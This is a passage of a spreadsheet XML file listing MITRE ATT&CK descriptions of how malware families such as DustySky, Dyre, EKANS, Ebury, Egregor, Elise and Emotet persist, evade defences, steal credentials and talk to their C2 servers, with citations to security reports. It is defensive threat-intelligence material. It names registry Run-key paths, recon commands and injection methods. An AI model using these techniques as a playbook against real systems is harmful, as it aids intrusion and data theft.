    <t>[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for removable media and duplicates itself onto it.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) checks for the existence of anti-virus.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) extracts basic information about the operating system.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has used both HTTP and HTTPS for C2.(Citation: DustySky)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) injects into other processes to load modules.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has a command to download and executes additional files.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)	 </t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) registers itself as a service by adding several Registry keys.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can delete log files generated from the malware stored at &lt;code&gt;C:\windows\temp\tmp0207&lt;/code&gt;.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture and store keystrokes.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has stored keystrokes and screenshots within the &lt;code&gt;%temp%\GoogleChrome&lt;/code&gt;, &lt;code&gt;%temp%\Downloads&lt;/code&gt;, and &lt;code&gt;%temp%\TrendMicroUpdate&lt;/code&gt; directories.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has encrypted strings with RC4.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture screenshots and store them locally.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can use [cmd](https://attack.mitre.org/software/S0106) to execute commands on a victim’s machine.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) uses standard encryption library functions to encrypt files.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) stops processes related to security and management software.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) removes backups of Volume Shadow Copies to disable any restoration capabilities.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) has been disguised as &lt;code&gt;update.exe&lt;/code&gt; to appear as a valid executable.(Citation: Dragos EKANS)</t>
  </si>
  <si>
    <t xml:space="preserve">[EKANS](https://attack.mitre.org/software/S0605) uses encoded strings in its process kill list.(Citation: FireEye Ransomware Feb 2020) </t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) looks for processes from a hard-coded list.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) stops database, data backup solution, antivirus, and ICS-related processes.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) can determine the domain of a compromised host.(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) can use Windows Mangement Instrumentation (WMI) calls to execute operations.(Citation: Dragos EKANS)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing directory listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing process listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can upload files over the C2 channel from the infected host.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has a function called "DeleteLeftovers" to remove certain artifacts of the attack.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can download and upload files to the victim's computer.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can make modifications to the Regsitry for persistence.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used a one-way communication method via GitLab and Digital Point to perform C2.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can achieve persistence through the Registry Run key.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can run a remote scriptlet that drops a file and executes it via regsvr32.exe.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can search for anti-virus products on the system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can harvest cookies and upload them to the C2 server.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the computer name from the victim's system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the username from the victim's machine.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has changed the creation date of files.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can automatically exfiltrate gathered SSH credentials.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has installed a self-signed RPM package mimicking the original system package on RPM based systems.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has used DNS requests over UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can disable SELinux Role-Based Access Control and deactivate PAM modules.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used a DGA to generate a domain name for C2.(Citation: ESET Ebury Feb 2014)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can exfiltrate SSH credentials through custom DNS queries.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can list directory entries.(Citation: ESET Ebury Oct 2017) </t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can hook logging functions so that nothing from the backdoor gets sent to the logging facility.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized &lt;code&gt;ssh-add&lt;/code&gt; function.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has obfuscated its strings with a simple XOR encryption with a static key.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can deactivate PAM modules to tamper with the sshd configuration.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has intercepted unencrypted private keys as well as private key pass-phrases.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has used Python to implement its DGA.(Citation: ESET Ebury Oct 2017)	</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has encoded C2 traffic in hexadecimal format.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) has used a valid, legitimate digital signature to evade detection.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can abuse the legitimate application policytool.exe to load a malicious DLL.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) has the ability to decrypt fileless loader modules.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can download additional payloads to a compromised host.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can use XOR, AES, and DES to encrypt loader shellcode.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used BITSadmin to download and execute malicious DLLs.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used DLL side-loading to execute its payload.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can collect any files found in the enumerated drivers before sending it to its C2 channel.(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has been decrypted before execution.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has disabled Windows Defender to evade protections.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can conduct Active Directory reconnaissance using tools such as Sharphound or [AdFind](https://attack.mitre.org/software/S0552).(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can modify the GPO to evade detection.(Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has the ability to download files from its C2 server.(Citation: Cybereason Egregor Nov 2020)(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has masqueraded the svchost.exe process to exfiltrate data.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used the Windows API to make detection more difficult.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used an encoded PowerShell command by a service created by [Cobalt Strike](https://attack.mitre.org/software/S0154) for lateral movement.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can inject its payload into iexplore.exe process.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used regsvr32.exe to execute malicious DLLs.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has checked for the LogMein event log in an attempt to encrypt files in remote machines.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554)'s payloads are custom-packed, archived and encrypted to prevent analysis.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a language check of the infected system and can query the CPU information (cupid).(Citation: JoeSecurity Egregor 2020)(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can enumerate all connected drives.(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used tools to gather information about users.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) contains functionality to query the local/system time.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.(Citation: Cyble Egregor Oct 2020)(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used batch files for execution and can launch Internet Explorer from cmd.exe.(Citation: JoeSecurity Egregor 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is capable of launching a remote shell on the host to delete itself.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>A variant of [Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) can download additional files from the C2 server for execution.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) creates a file in &lt;code&gt;AppData\Local\Microsoft\Windows\Explorer&lt;/code&gt; and stores all harvested data in that file.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If installing itself as a service fails, [Elise](https://attack.mitre.org/software/S0081) instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts several of its files, including configuration files.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) enumerates processes via the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If establishing persistence by installation as a new service fails, one variant of [Elise](https://attack.mitre.org/software/S0081) establishes persistence for the created .exe file by setting the following Registry key: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe&lt;/code&gt;. Other variants have set the following Registry keys for persistence: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self]&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD&lt;/code&gt;.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) exfiltrates data using cookie values that are Base64-encoded.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts exfiltrated data with RC4.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) performs timestomping of a CAB file it creates.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) configures itself as a service.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>A variant of [Emissary](https://attack.mitre.org/software/S0082) appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) injects its DLL file into a newly spawned Internet Explorer process.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute &lt;code&gt;gpresult&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to download files from the C2 server.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>The C2 server response to a beacon sent by a variant of [Emissary](https://attack.mitre.org/software/S0082) contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of [Emissary](https://attack.mitre.org/software/S0082) use various XOR operations to encrypt C2 data.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute ver and systeminfo commands.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to create a remote shell and execute specified commands.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is capable of configuring itself as a service.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed encrypting the data it collects before sending it to the C2 server. (Citation: Fortinet Emotet May 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is known to use RSA keys for encrypting C2 traffic. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. (Citation: US-CERT Emotet Jul 2018)(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed injecting in to Explorer.exe and other processes. (Citation: Picus Emotet Dec 2018)(Citation: Trend Micro Banking Malware Jan 2019)(Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation. (Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Red Canary Emotet Feb 2019) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping password grabber modules including [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) can brute force a local admin password, then use it to facilitate lateral movement.(Citation: Malwarebytes Emotet Dec 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that scrapes email data from Outlook.(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious link delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed to hook network APIs to monitor network traffic. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.(Citation: Talos Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has obfuscated macros within malicious documents to hide the URLs hosting the malware,  CMD.exe arguments, and PowerShell scripts. (Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: ESET Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed using a hard coded list of passwords to brute force user accounts. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: CIS Emotet Dec 2018) </t>
  </si>
  <si>
